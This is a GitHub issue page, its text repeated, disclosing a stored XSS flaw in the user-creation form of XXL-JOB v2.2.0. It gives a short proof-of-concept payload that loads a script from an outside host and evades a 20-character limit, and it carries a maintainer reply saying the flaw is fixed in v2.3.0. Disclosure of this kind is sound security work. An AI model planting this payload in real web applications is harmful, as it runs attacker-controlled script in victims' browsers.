Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Please answer some questions before submitting your issue. Thanks!
v2.2.0
Add User。
Add User Stored XSS vulnerabilities . Escape 20 length limit
url:https://github.com/xuxueli/xxl-job/blob/master/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java poc: <script/src=//14.rs> The page automatically loads and triggers XSS
Restoration suggestions:
The text was updated successfully, but these errors were encountered:
fixed in v2.3.0
Sorry, something went wrong.
No branches or pull requests
Please answer some questions before submitting your issue. Thanks!
Which version of XXL-JOB do you using?
v2.2.0
Expected behavior
Add User。
Actual behavior
Add User Stored XSS vulnerabilities . Escape 20 length limit
Steps to reproduce the behavior
url:https://github.com/xuxueli/xxl-job/blob/master/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java




poc: <script/src=//14.rs>
The page automatically loads and triggers XSS
Other information
Restoration suggestions:
The text was updated successfully, but these errors were encountered: